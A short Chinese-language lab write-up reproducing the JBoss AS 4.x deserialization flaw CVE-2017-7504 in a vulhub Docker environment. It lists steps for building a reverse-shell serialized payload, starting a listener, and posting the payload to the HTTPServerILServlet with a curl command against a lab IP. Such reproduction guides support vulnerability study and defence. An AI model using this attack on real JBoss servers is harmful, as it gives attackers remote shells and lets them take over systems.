CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现
一:漏洞原理
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
二:影响范围
JBoss AS 4.x及之前版本。
三:环境搭建
cd /vulhub/jboss/CVE-2017-7504
docker-compose up -d
四:攻击
CVE-2017-12149和CVE-2017-7504都是反序列化漏洞,用的东西都是一样的,可以参考上一篇《CVE-2017-12149(JBOSS反序列化远程代码执行漏洞)漏洞复现》。
1、在GitHub上面下载我们需要的漏洞poc。
2、进入JavaDeserH2HC目录下,然后下载执行生成二进制的payload文件。
3、设置接受shell的主机IP和端口
4、监听端口。
5、向被攻击服务器发送攻击Payload。(该反序列化漏洞发送在下面这个URL中:http://192.168.33.144:8080/jbossmq-httpil/HTTPServerILServlet)
curl http://192.168.33.144:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
6、查看监听结果